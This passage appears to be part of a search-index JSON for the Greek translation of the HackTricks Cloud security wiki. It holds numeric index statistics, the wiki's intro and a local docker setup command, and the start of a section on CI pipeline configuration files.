":{"body":121,"breadcrumbs":5,"title":1},"498":{"body":25,"breadcrumbs":6,"title":2},"499":{"body":223,"breadcrumbs":8,"title":4},"5":{"body":35,"breadcrumbs":3,"title":1},"50":{"body":22,"breadcrumbs":6,"title":1},"500":{"body":89,"breadcrumbs":5,"title":1},"501":{"body":9,"breadcrumbs":5,"title":1},"502":{"body":158,"breadcrumbs":5,"title":1},"503":{"body":176,"breadcrumbs":5,"title":1},"504":{"body":35,"breadcrumbs":4,"title":0},"505":{"body":37,"breadcrumbs":8,"title":3},"506":{"body":8,"breadcrumbs":9,"title":4},"507":{"body":4,"breadcrumbs":8,"title":3},"508":{"body":87,"breadcrumbs":11,"title":6},"509":{"body":9,"breadcrumbs":6,"title":1},"51":{"body":9,"breadcrumbs":6,"title":1},"510":{"body":23,"breadcrumbs":7,"title":2},"511":{"body":65,"breadcrumbs":7,"title":2},"512":{"body":14,"breadcrumbs":7,"title":2},"513":{"body":8,"breadcrumbs":6,"title":1},"514":{"body":5,"breadcrumbs":6,"title":1},"515":{"body":12,"breadcrumbs":6,"title":1},"516":{"body":0,"breadcrumbs":5,"title":0},"517":{"body":5,"breadcrumbs":7,"title":2},"518":{"body":11,"breadcrumbs":6,"title":1},"519":{"body":43,"breadcrumbs":7,"title":2},"52":{"body":24,"breadcrumbs":6,"title":1},"520":{"body":14,"breadcrumbs":6,"title":1},"521":{"body":42,"breadcrumbs":5,"title":0},"522":{"body":35,"breadcrumbs":11,"title":3},"523":{"body":57,"breadcrumbs":10,"title":2},"524":{"body":85,"breadcrumbs":10,"title":2},"525":{"body":36,"breadcrumbs":9,"title":1},"526":{"body":37,"breadcrumbs":8,"title":3},"527":{"body":42,"breadcrumbs":7,"title":2},"528":{"body":52,"breadcrumbs":6,"title":1},"529":{"body":39,"breadcrumbs":6,"title":1},"53":{"body":5,"breadcrumbs":6,"title":1},"530":{"body":19,"breadcrumbs":6,"title":1},"531":{"body":48,"breadcrumbs":7,"title":2},"532":{"body":38,"breadcrumbs":6,"title":1},"533":{"body":68,"breadcrumbs":6,"title":1},"534":{"body":42,"breadcrumbs":5,"title":0},"535":{"body":35,"breadcrumbs":10,"title":4},"536":{"body":0,"breadcrumbs":8,"title":2},"537":{"body":13,"breadcrumbs":8,"title":2},"538":{"body":15,"breadcrumbs":9,"title":3},"539":{"body":6,"breadcrumbs":9,"title":3},"54":{"body":1,"breadcrumbs":6,"title":1},"540":{"body":2,"breadcrumbs":10,"title":4},"541":{"body":11,"breadcrumbs":7,"title":1},"542":{"body":54,"breadcrumbs":6,"title":0},"543":{"body":3,"breadcrumbs":7,"title":1},"544":{"body":21,"breadcrumbs":8,"title":2},"545":{"body":30,"breadcrumbs":8,"title":2},"546":{"body":35,"breadcrumbs":9,"title":3},"547":{"body":53,"breadcrumbs":9,"title":3},"548":{"body":72,"breadcrumbs":6,"title":0},"549":{"body":11,"breadcrumbs":8,"title":2},"55":{"body":60,"breadcrumbs":6,"title":1},"550":{"body":14,"breadcrumbs":8,"title":2},"551":{"body":197,"breadcrumbs":8,"title":2},"552":{"body":115,"breadcrumbs":9,"title":3},"553":{"body":8,"breadcrumbs":8,"title":2},"554":{"body":382,"breadcrumbs":6,"title":0},"555":{"body":35,"breadcrumbs":6,"title":2},"556":{"body":13,"breadcrumbs":6,"title":2},"557":{"body":45,"breadcrumbs":7,"title":3},"558":{"body":11,"breadcrumbs":6,"title":2},"559":{"body":1,"breadcrumbs":5,"title":1},"56":{"body":10,"breadcrumbs":5,"title":0},"560":{"body":9,"breadcrumbs":6,"title":2},"561":{"body":35,"breadcrumbs":6,"title":2},"562":{"body":25,"breadcrumbs":8,"title":4},"563":{"body":46,"breadcrumbs":5,"title":1},"564":{"body":53,"breadcrumbs":5,"title":1},"565":{"body":69,"breadcrumbs":4,"title":0},"566":{"body":16,"breadcrumbs":4,"title":0},"567":{"body":48,"breadcrumbs":4,"title":0},"568":{"body":14,"breadcrumbs":4,"title":0},"569":{"body":12,"breadcrumbs":5,"title":1},"57":{"body":8,"breadcrumbs":6,"title":1},"570":{"body":44,"breadcrumbs":4,"title":0},"571":{"body":11,"breadcrumbs":4,"title":0},"572":{"body":13,"breadcrumbs":4,"title":0},"573":{"body":14,"breadcrumbs":5,"title":1},"574":{"body":16,"breadcrumbs":4,"title":0},"575":{"body":10,"breadcrumbs":4,"title":0},"576":{"body":14,"breadcrumbs":5,"title":1},"577":{"body":13,"breadcrumbs":5,"title":1},"578":{"body":14,"breadcrumbs":5,"title":1},"579":{"body":7,"breadcrumbs":5,"title":1},"58":{"body":64,"breadcrumbs":6,"title":1},"580":{"body":3,"breadcrumbs":4,"title":0},"581":{"body":6,"breadcrumbs":5,"title":1},"582":{"body":6,"breadcrumbs":5,"title":1},"583":{"body":9,"breadcrumbs":6,"title":2},"584":{"body":131,"breadcrumbs":5,"title":1},"585":{"body":126,"breadcrumbs":5,"title":1},"586":{"body":49,"breadcrumbs":5,"title":1},"587":{"body":48,"breadcrumbs":4,"title":0},"588":{"body":44,"breadcrumbs":4,"title":0},"589":{"body":46,"breadcrumbs":4,"title":0},"59":{"body":0,"breadcrumbs":5,"title":0},"590":{"body":44,"breadcrumbs":4,"title":0},"591":{"body":50,"breadcrumbs":4,"title":0},"592":{"body":44,"breadcrumbs":6,"title":2},"593":{"body":53,"breadcrumbs":4,"title":0},"594":{"body":45,"breadcrumbs":4,"title":0},"595":{"body":36,"breadcrumbs":4,"title":0},"596":{"body":35,"breadcrumbs":12,"title":5},"597":{"body":43,"breadcrumbs":12,"title":5},"598":{"body":20,"breadcrumbs":7,"title":0},"599":{"body":43,"breadcrumbs":7,"title":0},"6":{"body":35,"breadcrumbs":6,"title":3},"60":{"body":10,"breadcrumbs":8,"title":3},"600":{"body":45,"breadcrumbs":7,"title":0},"601":{"body":109,"breadcrumbs":9,"title":2},"602":{"body":43,"breadcrumbs":8,"title":1},"603":{"body":34,"breadcrumbs":8,"title":1},"604":{"body":40,"breadcrumbs":8,"title":3},"605":{"body":18,"breadcrumbs":7,"title":2},"606":{"body":18,"breadcrumbs":9,"title":4},"607":{"body":21,"breadcrumbs":5,"title":0},"608":{"body":64,"breadcrumbs":9,"title":4},"609":{"body":149,"breadcrumbs":8,"title":3},"61":{"body":2,"breadcrumbs":7,"title":2},"610":{"body":11,"breadcrumbs":9,"title":4},"611":{"body":87,"breadcrumbs":13,"title":8},"612":{"body":19,"breadcrumbs":7,"title":2},"613":{"body":8,"breadcrumbs":7,"title":2},"614":{"body":213,"breadcrumbs":9,"title":4},"615":{"body":38,"breadcrumbs":5,"title":0},"616":{"body":12,"breadcrumbs":7,"title":2},"617":{"body":208,"breadcrumbs":5,"title":0},"618":{"body":6,"breadcrumbs":6,"title":1},"619":{"body":63,"breadcrumbs":5,"title":0},"62":{"body":10,"breadcrumbs":7,"title":2},"620":{"body":142,"breadcrumbs":10,"title":5},"621":{"body":39,"breadcrumbs":7,"title":2},"622":{"body":7,"breadcrumbs":8,"title":3},"623":{"body":10,"breadcrumbs":6,"title":1},"624":{"body":8,"breadcrumbs":7,"title":2},"625":{"body":10,"breadcrumbs":6,"title":1},"626":{"body":12,"breadcrumbs":7,"title":2},"627":{"body":55,"breadcrumbs":9,"title":4},"628":{"body":12,"breadcrumbs":8,"title":3},"629":{"body":4,"breadcrumbs":6,"title":1},"63":{"body":12,"breadcrumbs":7,"title":2},"630":{"body":15,"breadcrumbs":5,"title":0},"631":{"body":4,"breadcrumbs":6,"title":1},"632":{"body":0,"breadcrumbs":5,"title":0},"633":{"body":90,"breadcrumbs":7,"title":2},"634":{"body":85,"breadcrumbs":5,"title":0},"635":{"body":4,"breadcrumbs":7,"title":2},"636":{"body":0,"breadcrumbs":5,"title":0},"637":{"body":9,"breadcrumbs":6,"title":1},"638":{"body":2,"breadcrumbs":6,"title":1},"639":{"body":7,"breadcrumbs":8,"title":3},"64":{"body":0,"breadcrumbs":5,"title":0},"640":{"body":31,"breadcrumbs":5,"title":0},"641":{"body":50,"breadcrumbs":5,"title":0},"642":{"body":35,"breadcrumbs":11,"title":3},"643":{"body":104,"breadcrumbs":10,"title":2},"644":{"body":36,"breadcrumbs":13,"title":4},"645":{"body":283,"breadcrumbs":12,"title":3},"646":{"body":251,"breadcrumbs":10,"title":1},"647":{"body":277,"breadcrumbs":11,"title":2},"648":{"body":0,"breadcrumbs":9,"title":0},"649":{"body":198,"breadcrumbs":9,"title":0},"65":{"body":6,"breadcrumbs":8,"title":3},"650":{"body":298,"breadcrumbs":12,"title":3},"651":{"body":142,"breadcrumbs":9,"title":0},"652":{"body":40,"breadcrumbs":8,"title":3},"653":{"body":11,"breadcrumbs":8,"title":3},"654":{"body":52,"breadcrumbs":7,"title":2},"655":{"body":7,"breadcrumbs":9,"title":3},"656":{"body":1,"breadcrumbs":7,"title":1},"657":{"body":8,"breadcrumbs":7,"title":1},"658":{"body":4,"breadcrumbs":10,"title":4},"659":{"body":24,"breadcrumbs":8,"title":2},"66":{"body":106,"breadcrumbs":5,"title":0},"660":{"body":78,"breadcrumbs":6,"title":0},"661":{"body":24,"breadcrumbs":6,"title":0},"662":{"body":35,"breadcrumbs":8,"title":3},"663":{"body":6,"breadcrumbs":6,"title":1},"664":{"body":16,"breadcrumbs":10,"title":5},"665":{"body":70,"breadcrumbs":10,"title":5},"666":{"body":284,"breadcrumbs":8,"title":3},"667":{"body":0,"breadcrumbs":6,"title":1},"668":{"body":101,"breadcrumbs":9,"title":4},"669":{"body":101,"breadcrumbs":8,"title":3},"67":{"body":32,"breadcrumbs":5,"title":0},"670":{"body":69,"breadcrumbs":9,"title":4},"671":{"body":34,"breadcrumbs":8,"title":3},"672":{"body":43,"breadcrumbs":7,"title":2},"673":{"body":54,"breadcrumbs":5,"title":0},"674":{"body":35,"breadcrumbs":8,"title":3},"675":{"body":214,"breadcrumbs":6,"title":1},"676":{"body":0,"breadcrumbs":6,"title":1},"677":{"body":19,"breadcrumbs":6,"title":1},"678":{"body":113,"breadcrumbs":6,"title":1},"679":{"body":3,"breadcrumbs":8,"title":3},"68":{"body":99,"breadcrumbs":9,"title":4},"680":{"body":161,"breadcrumbs":6,"title":1},"681":{"body":8,"breadcrumbs":6,"title":1},"682":{"body":81,"breadcrumbs":7,"title":2},"683":{"body":6,"breadcrumbs":7,"title":2},"684":{"body":45,"breadcrumbs":6,"title":1},"685":{"body":35,"breadcrumbs":6,"title":2},"686":{"body":0,"breadcrumbs":5,"title":1},"687":{"body":26,"breadcrumbs":5,"title":1},"688":{"body":15,"breadcrumbs":6,"title":2},"689":{"body":11,"breadcrumbs":5,"title":1},"69":{"body":4,"breadcrumbs":8,"title":3},"690":{"body":9,"breadcrumbs":6,"title":2},"691":{"body":11,"breadcrumbs":5,"title":1},"692":{"body":9,"breadcrumbs":5,"title":1},"693":{"body":22,"breadcrumbs":8,"title":4},"694":{"body":0,"breadcrumbs":7,"title":3},"695":{"body":12,"breadcrumbs":5,"title":1},"696":{"body":15,"breadcrumbs":5,"title":1},"697":{"body":15,"breadcrumbs":5,"title":1},"698":{"body":29,"breadcrumbs":6,"title":2},"699":{"body":0,"breadcrumbs":5,"title":1},"7":{"body":8,"breadcrumbs":4,"title":1},"70":{"body":26,"breadcrumbs":5,"title":0},"700":{"body":8,"breadcrumbs":7,"title":3},"701":{"body":33,"breadcrumbs":7,"title":3},"702":{"body":58,"breadcrumbs":6,"title":2},"703":{"body":55,"breadcrumbs":4,"title":0},"704":{"body":35,"breadcrumbs":8,"title":2},"705":{"body":63,"breadcrumbs":7,"title":1},"706":{"body":60,"breadcrumbs":7,"title":1},"707":{"body":39,"breadcrumbs":7,"title":1},"708":{"body":5,"breadcrumbs":8,"title":3},"709":{"body":40,"breadcrumbs":5,"title":0},"71":{"body":39,"breadcrumbs":5,"title":0},"710":{"body":81,"breadcrumbs":5,"title":0},"711":{"body":3,"breadcrumbs":5,"title":0},"712":{"body":5,"breadcrumbs":13,"title":4},"713":{"body":0,"breadcrumbs":9,"title":0},"714":{"body":53,"breadcrumbs":9,"title":0},"715":{"body":4,"breadcrumbs":10,"title":1},"716":{"body":6,"breadcrumbs":10,"title":1},"717":{"body":3,"breadcrumbs":10,"title":1},"718":{"body":6,"breadcrumbs":9,"title":0},"719":{"body":5,"breadcrumbs":6,"title":2},"72":{"body":0,"breadcrumbs":11,"title":2},"720":{"body":4,"breadcrumbs":4,"title":0},"721":{"body":5,"breadcrumbs":4,"title":0},"722":{"body":51,"breadcrumbs":5,"title":1},"723":{"body":1,"breadcrumbs":5,"title":1},"724":{"body":5,"breadcrumbs":10,"title":3},"725":{"body":0,"breadcrumbs":7,"title":0},"726":{"body":5,"breadcrumbs":7,"title":0},"727":{"body":10,"breadcrumbs":9,"title":2},"728":{"body":28,"breadcrumbs":8,"title":1},"729":{"body":3,"breadcrumbs":8,"title":1},"73":{"body":0,"breadcrumbs":12,"title":3},"730":{"body":5,"breadcrumbs":6,"title":2},"731":{"body":6,"breadcrumbs":4,"title":0},"732":{"body":54,"breadcrumbs":4,"title":0},"733":{"body":2,"breadcrumbs":5,"title":1},"734":{"body":18,"breadcrumbs":7,"title":3},"735":{"body":38,"breadcrumbs":4,"title":0},"736":{"body":9,"breadcrumbs":4,"title":0},"737":{"body":35,"breadcrumbs":4,"title":2},"738":{"body":5,"breadcrumbs":4,"title":2},"739":{"body":7,"breadcrumbs":4,"title":2},"74":{"body":0,"breadcrumbs":12,"title":2},"740":{"body":38,"breadcrumbs":6,"title":4},"741":{"body":0,"breadcrumbs":4,"title":2},"742":{"body":5,"breadcrumbs":3,"title":1},"743":{"body":82,"breadcrumbs":3,"title":1},"744":{"body":20,"breadcrumbs":2,"title":0},"745":{"body":15,"breadcrumbs":5,"title":3},"746":{"body":9,"breadcrumbs":4,"title":2},"747":{"body":10,"breadcrumbs":7,"title":5},"748":{"body":8,"breadcrumbs":5,"title":3},"749":{"body":4,"breadcrumbs":5,"title":3},"75":{"body":36,"breadcrumbs":7,"title":1},"750":{"body":61,"breadcrumbs":4,"title":2},"751":{"body":50,"breadcrumbs":5,"title":3},"752":{"body":64,"breadcrumbs":6,"title":4},"753":{"body":29,"breadcrumbs":6,"title":4},"754":{"body":38,"breadcrumbs":2,"title":0},"755":{"body":35,"breadcrumbs":6,"title":1},"756":{"body":13,"breadcrumbs":5,"title":0},"757":{"body":3,"breadcrumbs":5,"title":0},"758":{"body":13,"breadcrumbs":5,"title":0},"759":{"body":81,"breadcrumbs":5,"title":0},"76":{"body":6,"breadcrumbs":7,"title":1},"760":{"body":19,"breadcrumbs":6,"title":1},"761":{"body":17,"breadcrumbs":5,"title":0},"762":{"body":61,"breadcrumbs":5,"title":0},"763":{"body":3,"breadcrumbs":5,"title":0},"764":{"body":21,"breadcrumbs":5,"title":0},"765":{"body":21,"breadcrumbs":6,"title":1},"766":{"body":103,"breadcrumbs":7,"title":2},"767":{"body":3,"breadcrumbs":7,"title":2},"768":{"body":43,"breadcrumbs":5,"title":0},"769":{"body":35,"breadcrumbs":9,"title":1},"77":{"body":11,"breadcrumbs":7,"title":1},"770":{"body":0,"breadcrumbs":11,"title":3},"771":{"body":230,"breadcrumbs":9,"title":1},"772":{"body":122,"breadcrumbs":9,"title":1},"773":{"body":50,"breadcrumbs":8,"title":3},"774":{"body":0,"breadcrumbs":8,"title":3},"775":{"body":10,"breadcrumbs":6,"title":1},"776":{"body":6,"breadcrumbs":6,"title":1},"777":{"body":47,"breadcrumbs":6,"title":1},"778":{"body":4,"breadcrumbs":5,"title":0},"779":{"body":6,"breadcrumbs":6,"title":1},"78":{"body":9,"breadcrumbs":7,"title":1},"780":{"body":0,"breadcrumbs":6,"title":1},"781":{"body":35,"breadcrumbs":15,"title":5},"782":{"body":6,"breadcrumbs":12,"title":2},"783":{"body":6,"breadcrumbs":14,"title":4},"784":{"body":7,"breadcrumbs":11,"title":1},"785":{"body":2,"breadcrumbs":10,"title":0},"786":{"body":31,"breadcrumbs":10,"title":0},"787":{"body":35,"breadcrumbs":15,"title":5},"788":{"body":6,"breadcrumbs":12,"title":2},"789":{"body":40,"breadcrumbs":11,"title":1},"79":{"body":1,"breadcrumbs":8,"title":2},"790":{"body":35,"breadcrumbs":15,"title":5},"791":{"body":6,"breadcrumbs":12,"title":2},"792":{"body":55,"breadcrumbs":11,"title":1},"793":{"body":35,"breadcrumbs":15,"title":5},"794":{"body":6,"breadcrumbs":12,"title":2},"795":{"body":25,"breadcrumbs":11,"title":1},"796":{"body":216,"breadcrumbs":12,"title":2},"797":{"body":35,"breadcrumbs":15,"title":5},"798":{"body":6,"breadcrumbs":12,"title":2},"799":{"body":2,"breadcrumbs":10,"title":0},"8":{"body":4,"breadcrumbs":5,"title":2},"80":{"body":5,"breadcrumbs":7,"title":1},"800":{"body":32,"breadcrumbs":10,"title":0},"801":{"body":35,"breadcrumbs":15,"title":5},"802":{"body":6,"breadcrumbs":12,"title":2},"803":{"body":97,"breadcrumbs":12,"title":2},"804":{"body":121,"breadcrumbs":11,"title":1},"805":{"body":35,"breadcrumbs":15,"title":5},"806":{"body":6,"breadcrumbs":12,"title":2},"807":{"body":41,"breadcrumbs":12,"title":2},"808":{"body":8,"breadcrumbs":11,"title":1},"809":{"body":11,"breadcrumbs":11,"title":1},"81":{"body":8,"breadcrumbs":10,"title":4},"810":{"body":12,"breadcrumbs":11,"title":1},"811":{"body":13,"breadcrumbs":12,"title":2},"812":{"body":10,"breadcrumbs":11,"title":1},"813":{"body":18,"breadcrumbs":12,"title":2},"814":{"body":18,"breadcrumbs":12,"title":2},"815":{"body":43,"breadcrumbs":11,"title":1},"816":{"body":35,"breadcrumbs":13,"title":4},"817":{"body":5,"breadcrumbs":10,"title":1},"818":{"body":40,"breadcrumbs":9,"title":0},"819":{"body":25,"breadcrumbs":9,"title":0},"82":{"body":38,"breadcrumbs":6,"title":0},"820":{"body":33,"breadcrumbs":10,"title":1},"821":{"body":84,"breadcrumbs":11,"title":2},"822":{"body":35,"breadcrumbs":13,"title":4},"823":{"body":4,"breadcrumbs":10,"title":1},"824":{"body":29,"breadcrumbs":11,"title":2},"825":{"body":39,"breadcrumbs":9,"title":0},"826":{"body":52,"breadcrumbs":9,"title":0},"827":{"body":56,"breadcrumbs":9,"title":0},"828":{"body":35,"breadcrumbs":13,"title":4},"829":{"body":7,"breadcrumbs":10,"title":1},"83":{"body":35,"breadcrumbs":6,"title":1},"830":{"body":51,"breadcrumbs":9,"title":0},"831":{"body":35,"breadcrumbs":13,"title":4},"832":{"body":4,"breadcrumbs":10,"title":1},"833":{"body":112,"breadcrumbs":10,"title":1},"834":{"body":273,"breadcrumbs":11,"title":2},"835":{"body":78,"breadcrumbs":11,"title":2},"836":{"body":82,"breadcrumbs":10,"title":1},"837":{"body":102,"breadcrumbs":10,"title":1},"838":{"body":35,"breadcrumbs":13,"title":4},"839":{"body":7,"breadcrumbs":11,"title":2},"84":{"body":1,"breadcrumbs":5,"title":0},"840":{"body":2,"breadcrumbs":11,"title":2},"841":{"body":5,"breadcrumbs":12,"title":3},"842":{"body":32,"breadcrumbs":12,"title":3},"843":{"body":14,"breadcrumbs":10,"title":1},"844":{"body":15,"breadcrumbs":10,"title":1},"845":{"body":20,"breadcrumbs":10,"title":1},"846":{"body":10,"breadcrumbs":10,"title":1},"847":{"body":13,"breadcrumbs":10,"title":1},"848":{"body":16,"breadcrumbs":10,"title":1},"849":{"body":20,"breadcrumbs":10,"title":1},"85":{"body":0,"breadcrumbs":6,"title":1},"850":{"body":18,"breadcrumbs":10,"title":1},"851":{"body":12,"breadcrumbs":10,"title":1},"852":{"body":10,"breadcrumbs":10,"title":1},"853":{"body":136,"breadcrumbs":10,"title":1},"854":{"body":35,"breadcrumbs":10,"title":1},"855":{"body":7,"breadcrumbs":9,"title":0},"856":{"body":7,"breadcrumbs":10,"title":1},"857":{"body":59,"breadcrumbs":10,"title":1},"858":{"body":23,"breadcrumbs":10,"title":1},"859":{"body":8,"breadcrumbs":10,"title":1},"86":{"body":0,"breadcrumbs":5,"title":0},"860":{"body":27,"breadcrumbs":10,"title":1},"861":{"body":26,"breadcrumbs":10,"title":1},"862":{"body":9,"breadcrumbs":10,"title":1},"863":{"body":59,"breadcrumbs":10,"title":1},"864":{"body":35,"breadcrumbs":13,"title":4},"865":{"body":4,"breadcrumbs":10,"title":1},"866":{"body":11,"breadcrumbs":10,"title":1},"867":{"body":9,"breadcrumbs":10,"title":1},"868":{"body":7,"breadcrumbs":10,"title":1},"869":{"body":17,"breadcrumbs":10,"title":1},"87":{"body":11,"breadcrumbs":5,"title":0},"870":{"body":0,"breadcrumbs":10,"title":1},"871":{"body":50,"breadcrumbs":12,"title":3},"872":{"body":8,"breadcrumbs":10,"title":1},"873":{"body":15,"breadcrumbs":10,"title":1},"874":{"body":0,"breadcrumbs":10,"title":1},"875":{"body":32,"breadcrumbs":11,"title":2},"876":{"body":7,"breadcrumbs":10,"title":1},"877":{"body":0,"breadcrumbs":10,"title":1},"878":{"body":45,"breadcrumbs":11,"title":2},"879":{"body":35,"breadcrumbs":13,"title":4},"88":{"body":1,"breadcrumbs":5,"title":0},"880":{"body":6,"breadcrumbs":10,"title":1},"881":{"body":45,"breadcrumbs":10,"title":1},"882":{"body":35,"breadcrumbs":10,"title":1},"883":{"body":3,"breadcrumbs":9,"title":0},"884":{"body":16,"breadcrumbs":10,"title":1},"885":{"body":17,"breadcrumbs":10,"title":1},"886":{"body":12,"breadcrumbs":10,"title":1},"887":{"body":10,"breadcrumbs":10,"title":1},"888":{"body":40,"breadcrumbs":10,"title":1},"889":{"body":35,"breadcrumbs":10,"title":1},"89":{"body":9,"breadcrumbs":5,"title":0},"890":{"body":3,"breadcrumbs":9,"title":0},"891":{"body":35,"breadcrumbs":9,"title":0},"892":{"body":35,"breadcrumbs":10,"title":1},"893":{"body":5,"breadcrumbs":11,"title":2},"894":{"body":117,"breadcrumbs":9,"title":0},"895":{"body":35,"breadcrumbs":8,"title":3},"896":{"body":29,"breadcrumbs":9,"title":4},"897":{"body":5,"breadcrumbs":9,"title":4},"898":{"body":51,"breadcrumbs":8,"title":3},"899":{"body":3,"breadcrumbs":5,"title":0},"9":{"body":32,"breadcrumbs":6,"title":3},"90":{"body":1,"breadcrumbs":5,"title":0},"900":{"body":7,"breadcrumbs":6,"title":1},"901":{"body":53,"breadcrumbs":5,"title":0},"902":{"body":35,"breadcrumbs":11,"title":3},"903":{"body":19,"breadcrumbs":9,"title":1},"904":{"body":6,"breadcrumbs":13,"title":5},"905":{"body":27,"breadcrumbs":9,"title":1},"906":{"body":18,"breadcrumbs":10,"title":2},"907":{"body":19,"breadcrumbs":10,"title":2},"908":{"body":36,"breadcrumbs":10,"title":2},"909":{"body":35,"breadcrumbs":11,"title":3},"91":{"body":1,"breadcrumbs":5,"title":0},"910":{"body":6,"breadcrumbs":10,"title":2},"911":{"body":43,"breadcrumbs":22,"title":14},"912":{"body":84,"breadcrumbs":8,"title":0},"913":{"body":19,"breadcrumbs":17,"title":9},"914":{"body":9,"breadcrumbs":10,"title":2},"915":{"body":1,"breadcrumbs":10,"title":2},"916":{"body":12,"breadcrumbs":8,"title":0},"917":{"body":41,"breadcrumbs":10,"title":2},"918":{"body":35,"breadcrumbs":13,"title":4},"919":{"body":6,"breadcrumbs":11,"title":2},"92":{"body":1,"breadcrumbs":6,"title":1},"920":{"body":360,"breadcrumbs":10,"title":1},"921":{"body":35,"breadcrumbs":11,"title":3},"922":{"body":3,"breadcrumbs":9,"title":1},"923":{"body":88,"breadcrumbs":10,"title":2},"924":{"body":35,"breadcrumbs":11,"title":3},"925":{"body":4,"breadcrumbs":9,"title":1},"926":{"body":19,"breadcrumbs":10,"title":2},"927":{"body":11,"breadcrumbs":8,"title":0},"928":{"body":52,"breadcrumbs":8,"title":0},"929":{"body":19,"breadcrumbs":9,"title":1},"93":{"body":2,"breadcrumbs":5,"title":0},"930":{"body":27,"breadcrumbs":10,"title":2},"931":{"body":18,"breadcrumbs":9,"title":1},"932":{"body":121,"breadcrumbs":12,"title":4},"933":{"body":35,"breadcrumbs":11,"title":3},"934":{"body":65,"breadcrumbs":11,"title":3},"935":{"body":35,"breadcrumbs":11,"title":3},"936":{"body":6,"breadcrumbs":9,"title":1},"937":{"body":19,"breadcrumbs":10,"title":2},"938":{"body":5,"breadcrumbs":9,"title":1},"939":{"body":18,"breadcrumbs":9,"title":1},"94":{"body":3,"breadcrumbs":6,"title":1},"940":{"body":19,"breadcrumbs":9,"title":1},"941":{"body":42,"breadcrumbs":9,"title":1},"942":{"body":35,"breadcrumbs":11,"title":3},"943":{"body":6,"breadcrumbs":9,"title":1},"944":{"body":8,"breadcrumbs":11,"title":3},"945":{"body":94,"breadcrumbs":11,"title":3},"946":{"body":25,"breadcrumbs":9,"title":1},"947":{"body":2,"breadcrumbs":10,"title":2},"948":{"body":2,"breadcrumbs":9,"title":1},"949":{"body":8,"breadcrumbs":8,"title":0},"95":{"body":1,"breadcrumbs":5,"title":0},"950":{"body":14,"breadcrumbs":10,"title":2},"951":{"body":38,"breadcrumbs":8,"title":0},"952":{"body":35,"breadcrumbs":11,"title":3},"953":{"body":7,"breadcrumbs":9,"title":1},"954":{"body":18,"breadcrumbs":8,"title":0},"955":{"body":64,"breadcrumbs":8,"title":0},"956":{"body":35,"breadcrumbs":13,"title":4},"957":{"body":4,"breadcrumbs":11,"title":2},"958":{"body":88,"breadcrumbs":12,"title":3},"959":{"body":268,"breadcrumbs":12,"title":3},"96":{"body":29,"breadcrumbs":6,"title":1},"960":{"body":38,"breadcrumbs":9,"title":0},"961":{"body":35,"breadcrumbs":11,"title":3},"962":{"body":11,"breadcrumbs":9,"title":1},"963":{"body":38,"breadcrumbs":9,"title":1},"964":{"body":0,"breadcrumbs":9,"title":1},"965":{"body":28,"breadcrumbs":9,"title":1},"966":{"body":11,"breadcrumbs":9,"title":1},"967":{"body":11,"breadcrumbs":9,"title":1},"968":{"body":3,"breadcrumbs":15,"title":7},"969":{"body":74,"breadcrumbs":10,"title":2},"97":{"body":41,"breadcrumbs":6,"title":1},"970":{"body":0,"breadcrumbs":9,"title":1},"971":{"body":0,"breadcrumbs":9,"title":1},"972":{"body":0,"breadcrumbs":9,"title":1},"973":{"body":0,"breadcrumbs":8,"title":0},"974":{"body":6,"breadcrumbs":11,"title":3},"975":{"body":38,"breadcrumbs":8,"title":0},"976":{"body":4,"breadcrumbs":15,"title":2},"977":{"body":31,"breadcrumbs":15,"title":2},"978":{"body":169,"breadcrumbs":13,"title":0},"979":{"body":38,"breadcrumbs":13,"title":0},"98":{"body":3,"breadcrumbs":6,"title":1},"980":{"body":35,"breadcrumbs":11,"title":3},"981":{"body":3,"breadcrumbs":9,"title":1},"982":{"body":17,"breadcrumbs":9,"title":1},"983":{"body":117,"breadcrumbs":9,"title":1},"984":{"body":16,"breadcrumbs":9,"title":1},"985":{"body":69,"breadcrumbs":9,"title":1},"986":{"body":9,"breadcrumbs":9,"title":1},"987":{"body":2,"breadcrumbs":9,"title":1},"988":{"body":32,"breadcrumbs":8,"title":0},"989":{"body":35,"breadcrumbs":11,"title":3},"99":{"body":3,"breadcrumbs":6,"title":1},"990":{"body":0,"breadcrumbs":9,"title":1},"991":{"body":98,"breadcrumbs":9,"title":1},"992":{"body":10,"breadcrumbs":10,"title":2},"993":{"body":10,"breadcrumbs":10,"title":2},"994":{"body":13,"breadcrumbs":26,"title":18},"995":{"body":3,"breadcrumbs":10,"title":2},"996":{"body":11,"breadcrumbs":9,"title":1},"997":{"body":4,"breadcrumbs":9,"title":1},"998":{"body":9,"breadcrumbs":9,"title":1},"999":{"body":33,"breadcrumbs":10,"title":2}},"docs":{"0":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos. Hacktricks λογότυπα & κίνηση σχεδιασμένα από @ppiernacho .","breadcrumbs":"HackTricks Cloud » HackTricks Cloud","id":"0","title":"HackTricks Cloud"},"1":{"body":"bash # Download latest version of hacktricks cloud\ngit clone https://github.com/HackTricks-wiki/hacktricks-cloud\n# Run the docker container indicating the path to the hacktricks-cloud folder\ndocker run -d --rm -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \"cd /app && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\" Η τοπική σας έκδοση του HackTricks Cloud θα είναι διαθέσιμη στο http://localhost:3377 μετά από ένα λεπτό.","breadcrumbs":"HackTricks Cloud » Εκτέλεση του HackTricks Cloud Τοπικά","id":"1","title":"Εκτέλεση του HackTricks Cloud Τοπικά"},"10":{"body":"Ο πιο κοινός τρόπος για να ορίσετε μια pipeline είναι χρησιμοποιώντας ένα αρχείο διαμόρφωσης CI που φιλοξενείται στο αποθετήριο που κατασκευάζει η pipeline. Αυτό το αρχείο περιγράφει τη σειρά εκτέλεσης των εργασιών, τις συνθήκες που επηρεάζουν τη ροή και τις ρυθμίσεις του περιβάλλοντος κατασκευής. Αυτά τα αρχεία συνήθως έχουν ένα συνεπές όνομα και μορφή, για παράδειγμα — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), και τα YAML αρχεία GitHub Actions που 